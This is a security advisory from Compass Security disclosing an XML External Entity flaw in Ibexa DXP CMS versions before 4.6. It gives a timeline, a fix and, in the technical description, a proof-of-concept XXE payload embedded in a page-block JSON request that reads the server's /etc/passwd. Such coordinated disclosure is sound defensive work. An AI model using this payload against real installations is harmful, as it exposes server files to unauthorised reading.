#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Ibexa DXP CMS
# Vendor:   Ibexa GmbH
# CSNC ID:  CSNC-2025-006
# CVE ID:   TBD
# Subject:  XML External Entity (XXE) Injection
# Risk:     Medium
# Effect:   Remotely exploitable
# Author:   Dennis Henke <dennis.henke@compass-security.com>
# Date:     09.01.2025
#
#############################################################

Introduction
------------
Ibexa DXP software empowers businesses to offer their customers
industry-leading online experiences. With a focus on delivering effective
content, offering personalized customer journeys, and facilitating
multi-channel purchases and customer service, our digital experience software
revolutionizes B2B sales, helping you grow your revenue. [1]

Compass Security discovered a security flaw in Ibexa DXP CMS, 
which allows an attacker with content edit permissions to read arbitrary files on the server.

Affected
--------

Vulnerable:
 * All versions before v4.6

Not vulnerable:
 * All versions from v4.6 

Not tested:
-

 
Technical Description
---------------------
The HTTP request updating the block configuration can be manipulated to follow external XML entities and therefore
read arbitrary files of the server.

When updating a page, the attributes of each block in the page's content is sent as JSON-encapsulated XML data.
In the following example, an external entity ("xxetyq2w") has been embedded,
which directs the application's XML parser to embed the server's /etc/passwd file into the page.

"attributes": [
    {
        "id": "366",
        "name": "content",
        "value": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE
foo [<!ENTITY xxetyq2w SYSTEM \"file:\/\/\/etc\/passwd\"> ]>\n<section
xmlns=\"http:\/\/docbook.org\/ns\/docbook\" xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\"
xmlns:ezxhtml=\"http:\/\/ibexa.co\/xmlns\/dxp\/docbook\/xhtml\"
xmlns:ezcustom=\"http:\/\/ibexa.co\/xmlns\/dxp\/docbook\/custom\" version=\"5.0-variant
ezpublish-1.0\"><para>Pentest&xxetyq2w;<\/para><\/section>\n"
        }
    ]

Workaround / Fix
----------------
XML Document Type Definitions (DTDs) should be disabled.
If completely disabling DTDs is not feasible, then external entities and external DTD declarations
must be disabled in a manner specific to each parser.

Update to the most recent version of Ibexa DXP CMS.


Timeline
--------
2024-12-18:     Discovery by Dennis Henke
2024-12-20:     Initial vendor notification
2024-12-20:     Initial vendor response
2025-04-14:     Release of fixed Version / Patch
2025-04-14:     Coordinated public disclosure date


References
----------
[1] https://www.ibexa.co/products/overview